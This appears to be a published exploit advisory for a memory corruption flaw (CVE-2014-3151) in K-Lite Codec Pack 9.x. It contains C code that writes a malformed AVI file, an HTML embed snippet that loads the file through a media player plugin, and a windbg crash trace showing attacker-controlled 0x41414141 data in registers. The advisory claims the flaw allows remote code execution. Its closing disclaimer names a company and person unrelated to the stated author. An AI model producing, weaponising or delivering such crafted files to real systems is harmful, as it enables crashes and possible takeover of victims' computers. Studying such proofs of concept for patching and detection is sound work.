
K-Lite CODEC version 9.x Memory Corruption Vulnerability

# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]
# Date: [2014/05/3]
# Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.codecguide.com]
# Software Link: [http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]
# Version: [version 9.x and prior]
# Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit]
# CVE : [CVE-2014-3151]
# Found by Piece Dumb Fuzzer

details:

K-lite codec version 9.x and earlier are vulnerable to a memory corruption
flaw that allows remote attackers to execute arbitrary code and take control
of the affected system via a malformed AVI file.

Tested with the latest edition of Windows Media Player, Internet Explorer,
GOM Player and KMPlayer on Windows XP and Windows 7, x64 and x86.

--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger memory corruption :

#include<stdio.h>
#include<stdlib.h>
#include<windows.h>

/*
 * The 154-byte malformed AVI sample the PoC writes to disk.
 *
 * The leading bytes spell the RIFF container tags "RIFF", "AVI ", "LIST"
 * and "INFO"; the two 4-byte values between them are presumably the
 * little-endian RIFF and LIST size fields (0x000A5E44 and 0x0000FC7C) -
 * confirm against the AVI/RIFF layout before relying on that reading.
 * After "INFO" come the bytes "--->", the value 0xFFFFFFFC and a 122-byte
 * run of 0x41 ('A'). The windbg trace further down the page shows
 * ecx=41414141 at the faulting `mov edi,dword ptr [ecx]`, i.e. bytes from
 * the 'A' run end up being dereferenced as a pointer by the crashing parser.
 */
unsigned char sc[154] = {
    /* "RIFF", then 0x000A5E44 little-endian */
    0x52, 0x49, 0x46, 0x46,  0x44, 0x5E, 0x0A, 0x00,
    /* "AVI " form type, "LIST" chunk tag */
    0x41, 0x56, 0x49, 0x20,  0x4C, 0x49, 0x53, 0x54,
    /* 0x0000FC7C little-endian, then "INFO" */
    0x7C, 0xFC, 0x00, 0x00,  0x49, 0x4E, 0x46, 0x4F,
    /* "--->", then 0xFFFFFFFC little-endian */
    0x2D, 0x2D, 0x2D, 0x3E,  0xFC, 0xFF, 0xFF, 0xFF,
    /* 122 x 0x41 ('A'): seven rows of 16 plus one row of 10 */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
};
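/*
 * Write the malformed AVI sample held in `sc` to disk.
 *
 * Usage: poc [output-path]
 *   argv[1] optionally overrides the output path; the default is the
 *   "d:\\poc.AVI" the PoC always used (the <embed> snippet further down the
 *   page points at D:/PoC.avi, so keep the default if you use both).
 *
 * Returns 0 on success, 1 if the file could not be created, fully written
 * or closed. The Win32 error code is printed on each failure path.
 */
int main(int argc, char *argv[])
{
    const char *path = (argc > 1) ? argv[1] : "d:\\poc.AVI";
    /* Size comes from the array itself, not a hand-maintained literal. */
    const DWORD want = (DWORD)sizeof sc;
    DWORD dwBytesWritten = 0;
    int rc = 1;

    HANDLE fileHandle = CreateFile(path, GENERIC_WRITE,
                                   FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                                   CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if (fileHandle == INVALID_HANDLE_VALUE) {
        printf("(-)Failed to Create File %s (error %lu)\n",
               path, (unsigned long)GetLastError());
        /* Non-zero so a caller or script can tell nothing was written. */
        return rc;
    }

    printf("(+) Writing File ...\n");
    /* A failed or short write leaves a file that is not the intended sample. */
    if (!WriteFile(fileHandle, sc, want, &dwBytesWritten, NULL) ||
        dwBytesWritten != want) {
        printf("(-)Failed to Write File (error %lu, wrote %lu of %lu bytes)\n",
               (unsigned long)GetLastError(),
               (unsigned long)dwBytesWritten, (unsigned long)want);
    } else {
        rc = 0;
    }

    /* A failing CloseHandle means the data may not have reached the disk. */
    if (!CloseHandle(fileHandle)) {
        printf("(-)Failed to Close File (error %lu)\n",
               (unsigned long)GetLastError());
        rc = 1;
    }
    return rc;
}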


--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger the memory corruption remotely:


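<!-- Embeds the sample in the Windows Media Player browser plugin
     (type application/x-mplayer2). src points at the path the C PoC writes
     to (d:\poc.AVI; Windows paths are case-insensitive), so this only
     exercises the parser on a machine where that file already exists.
     autostart is "false", so presumably nothing is parsed until playback is
     started from the control - not verified here.
     The pluginspage URL was split across two lines by mail wrapping in the
     original listing; it is one attribute value. -->
<embed type="application/x-mplayer2"
       pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
       name="mediaplayer1"
       ShowStatusBar="true"
       EnableContextMenu="false"
       autostart="false"
       height="330" width="360"
       loop="false"
       src="D:/PoC.avi" />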



windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000   C:\Program Files\Windows Media
Player\wmplayer.exe
ModLoad: 7c900000 7c9b2000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 12950000 133b5000   C:\WINDOWS\system32\wmp.dll
ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 75a70000 75a91000   C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 59a60000 59b01000   C:\WINDOWS\system32\dbghelp.dll
ModLoad: 13740000 13f1b000   C:\WINDOWS\system32\wmploc.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 00ba0000 00e65000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 4ec50000 4edf6000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
ModLoad: 7e720000 7e7d0000   C:\WINDOWS\system32\SXS.DLL
ModLoad: 0d780000 0d7be000   C:\Program Files\Windows Media Player\mpvis.dll
ModLoad: 63000000 630e6000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01400000 01409000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 15110000 1536c000   C:\WINDOWS\system32\wmvcore.dll
ModLoad: 11c70000 11caa000   C:\WINDOWS\system32\WMASF.DLL
ModLoad: 76380000 76385000   C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 77690000 776b1000   C:\WINDOWS\system32\NTMARTA.DLL
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 0bef0000 0bf27000   C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 61da0000 61db0000   C:\WINDOWS\system32\mcicda.dll
ModLoad: 0e510000 0e562000   C:\WINDOWS\system32\mswmdm.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 5b860000 5b8b6000   C:\WINDOWS\system32\netapi32.dll
ModLoad: 0dfb0000 0dfe9000   C:\WINDOWS\system32\mspmsp.dll
ModLoad: 07940000 0797b000   C:\WINDOWS\system32\cewmdm.dll
ModLoad: 11d10000 11d1d000   C:\WINDOWS\system32\wmdmps.dll
ModLoad: 62bf0000 62c22000   C:\WINDOWS\system32\upnphost.dll
ModLoad: 4d4f0000 4d549000   C:\WINDOWS\system32\WINHTTP.dll
ModLoad: 74f00000 74f0c000   C:\WINDOWS\system32\SSDPAPI.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 13fe0000 14014000   C:\Program Files\Windows Media
Player\wmpnssci.dll
ModLoad: 109c0000 109ec000   C:\WINDOWS\system32\PortableDeviceTypes.dll
ModLoad: 10930000 10979000   C:\WINDOWS\system32\PortableDeviceApi.dll
ModLoad: 0e020000 0e089000   C:\WINDOWS\system32\MSSCP.dll
ModLoad: 75cf0000 75d81000   C:\WINDOWS\system32\mlang.dll
ModLoad: 08b70000 08c65000   C:\WINDOWS\system32\drmv2clt.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 77c70000 77c94000   C:\WINDOWS\system32\msv1_0.dll
ModLoad: 722b0000 722b5000   C:\WINDOWS\system32\sensapi.dll
ModLoad: 14030000 14054000   C:\WINDOWS\system32\wmpps.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 10000000 10008000   C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
ModLoad: 5cb00000 5cb6e000   C:\WINDOWS\system32\shimgvw.dll
ModLoad: 38a70000 38a7c000
C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
ModLoad: 78130000 781cb000
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 02f30000 02f9e000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000   C:\Program Files\K-Lite Codec
Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000   C:\Program Files\K-Lite Codec
Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio
Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec
Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240
edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]
ds:0023:41414141=????????



//The information contained within this publication is

//supplied "as-is" with no warranties or guarantees of fitness

//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information
